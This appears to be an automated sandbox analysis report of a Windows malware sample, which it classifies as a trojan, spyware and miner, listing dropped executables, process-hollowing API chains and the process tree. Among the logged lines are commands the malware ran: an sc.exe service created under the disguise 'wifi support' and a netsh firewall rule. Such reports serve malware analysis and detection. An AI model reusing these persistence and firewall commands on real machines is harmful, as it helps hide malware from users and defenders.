                          Source: Yara matchFile source: 00000024.00000002.807575070.0000000000650000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000003.780018628.0000000000560000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000024.00000003.803811514.0000000000490000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 86C4.exe PID: 1368, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: lagavljy.exe PID: 4544, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5940, type: MEMORYSTR

                          System Summary:

                          barindex
                          PE file has nameless sectionsShow sources
                          Source: ACEF.exe.7.drStatic PE information: section name:
                          Source: ACEF.exe.7.drStatic PE information: section name:
                          Source: ACEF.exe.7.drStatic PE information: section name:
                          Source: ACEF.exe.7.drStatic PE information: section name:
                          Source: ACEF.exe.7.drStatic PE information: section name:
                          Source: ACEF.exe.7.drStatic PE information: section name:
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5756 -ip 5756
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_004100FB
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00411D61
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00411125
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00411669
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_004046DE
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00410BE1
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00412BF3
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00533253
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_005331FF
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_2_00402A5F
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_2_00402AB3
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_1_00402A5F
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_1_00402AB3
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_2_00402A5F
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_2_00402AB3
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_1_00402A5F
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_1_00402B2E
                          Source: C:\Users\user\AppData\Local\Temp\D984.exeCode function: 14_2_004027CA
                          Source: C:\Users\user\AppData\Local\Temp\D984.exeCode function: 14_2_00401FF1
                          Source: C:\Users\user\AppData\Local\Temp\D984.exeCode function: 14_2_0040158E
                          Source: C:\Users\user\AppData\Local\Temp\D984.exeCode function: 14_2_004015A6
                          Source: C:\Users\user\AppData\Local\Temp\D984.exeCode function: 14_2_004015BC
                          Source: C:\Users\user\AppData\Local\Temp\D984.exeCode function: 14_2_00411065
                          Source: C:\Users\user\AppData\Local\Temp\D984.exeCode function: 14_2_00412A02
                          Source: C:\Users\user\AppData\Local\Temp\D984.exeCode function: 14_2_0040CAC5
                          Source: C:\Users\user\AppData\Local\Temp\D984.exeCode function: 14_2_00410B21
                          Source: C:\Users\user\AppData\Local\Temp\D984.exeCode function: 14_2_004115A9
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeCode function: 19_2_00402A5F
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeCode function: 19_2_00402AB3
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00410800
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00411280
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_004103F0
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_004109F0
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeCode function: 21_2_0040C913
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeCode function: 22_2_031996F0
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeCode function: 22_2_03190470
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeCode function: 22_2_03190462
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeCode function: 22_2_032CDE18
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeCode function: 22_2_032C8658
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeCode function: 22_2_032C8DE8
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeCode function: 22_2_032C8DF8
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeCode function: 36_2_0040C913
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 39_2_0032C913
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeCode function: 43_2_03009E20
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeCode function: 43_2_03009040
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeCode function: 21_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,VirtualAlloc,
                          Source: U3E7zMaux2.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: U3E7zMaux2.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: U3E7zMaux2.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: U3E7zMaux2.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 8ED5.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 8ED5.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 8ED5.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 8ED5.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: D984.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: D984.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: D984.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: E666.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: E666.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: E666.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: E666.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 7CA1.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 7CA1.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 7CA1.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 7CA1.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 86C4.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 86C4.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 86C4.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 86C4.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: B58B.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: B58B.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: B58B.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 7801.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 7801.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 7801.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: BEB3.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: uufaeea.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: uufaeea.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: uufaeea.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: uufaeea.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: lagavljy.exe.21.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: lagavljy.exe.21.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: lagavljy.exe.21.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: lagavljy.exe.21.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeSection loaded: mscorjit.dll
                          Source: U3E7zMaux2.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\shayesoq\Jump to behavior
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: String function: 00404CA4 appears 43 times
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeCode function: String function: 03000550 appears 31 times
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeCode function: String function: 0040EE2A appears 40 times
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeCode function: String function: 00402544 appears 53 times
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: String function: 004048D0 appears 460 times
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 0_2_00530110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_2_00401962 Sleep,NtTerminateProcess,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_2_0040196D Sleep,NtTerminateProcess,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_2_00401A0B NtTerminateProcess,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_2_00402491 NtOpenKey,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeCode function: 1_1_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_2_00401962 Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_2_0040196D Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_2_00401A0B NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_2_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_2_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_1_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\uufaeeaCode function: 12_1_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeCode function: 19_2_00401962 Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeCode function: 19_2_0040196D Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeCode function: 19_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeCode function: 19_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeCode function: 19_2_00401A0B NtTerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeCode function: 19_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeCode function: 19_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeCode function: 19_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeCode function: 19_2_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeCode function: 19_2_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeCode function: 22_2_0599F5C0 NtUnmapViewOfSection,
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeCode function: 22_2_0599F6A0 NtAllocateVirtualMemory,
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeCode function: 21_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
                          Source: U3E7zMaux2.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: D984.exe.7.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: E666.exe.7.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 7CA1.exe.7.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 86C4.exe.7.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: B58B.exe.7.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 7801.exe.7.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: uufaeea.7.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: lagavljy.exe.21.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: ACEF.exe.7.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                          Source: 9A02.exe.7.drStatic PE information: Section: .rsrc ZLIB complexity 0.997770524618
                          Source: ACEF.exe.7.drStatic PE information: Section: ZLIB complexity 1.00044194799
                          Source: ACEF.exe.7.drStatic PE information: Section: ZLIB complexity 1.00537109375
                          Source: BEB3.exe.7.drStatic PE information: Section: .didata ZLIB complexity 0.999523355577
                          Source: CC60.exe.7.drStatic PE information: Section: .rsrc ZLIB complexity 0.996134750716
                          Source: U3E7zMaux2.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\uufaeeaJump to behavior
                          Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@60/50@96/18
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeCode function: 21_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeCode function: 36_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 39_2_00329A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeCode function: 21_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\738C.tmp\738D.tmp\738E.bat C:\Users\user\AppData\Local\Temp\9A02.exe
                          Source: U3E7zMaux2.exeVirustotal: Detection: 41%
                          Source: U3E7zMaux2.exeReversingLabs: Detection: 46%
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: unknownProcess created: C:\Users\user\Desktop\U3E7zMaux2.exe "C:\Users\user\Desktop\U3E7zMaux2.exe"
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeProcess created: C:\Users\user\Desktop\U3E7zMaux2.exe "C:\Users\user\Desktop\U3E7zMaux2.exe"
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\uufaeea C:\Users\user\AppData\Roaming\uufaeea
                          Source: C:\Users\user\AppData\Roaming\uufaeeaProcess created: C:\Users\user\AppData\Roaming\uufaeea C:\Users\user\AppData\Roaming\uufaeea
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D984.exe C:\Users\user\AppData\Local\Temp\D984.exe
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5756 -ip 5756
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E666.exe C:\Users\user\AppData\Local\Temp\E666.exe
                          Source: C:\Users\user\AppData\Local\Temp\D984.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 520
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeProcess created: C:\Users\user\AppData\Local\Temp\E666.exe C:\Users\user\AppData\Local\Temp\E666.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\7CA1.exe C:\Users\user\AppData\Local\Temp\7CA1.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\86C4.exe C:\Users\user\AppData\Local\Temp\86C4.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8EC4.exe C:\Users\user\AppData\Local\Temp\8EC4.exe
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\shayesoq\
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lagavljy.exe" C:\Windows\SysWOW64\shayesoq\
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description shayesoq "wifi internet conection
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start shayesoq
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Windows\SysWOW64\shayesoq\lagavljy.exe C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d"C:\Users\user\AppData\Local\Temp\86C4.exe"
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess created: C:\Users\user\AppData\Local\Temp\8EC4.exe C:\Users\user\AppData\Local\Temp\8EC4.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\7801.exe C:\Users\user\AppData\Local\Temp\7801.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8ED5.exe C:\Users\user\AppData\Local\Temp\8ED5.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9A02.exe C:\Users\user\AppData\Local\Temp\9A02.exe
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\8ED5.exeProcess created: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe"
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\738C.tmp\738D.tmp\738E.bat C:\Users\user\AppData\Local\Temp\9A02.exe
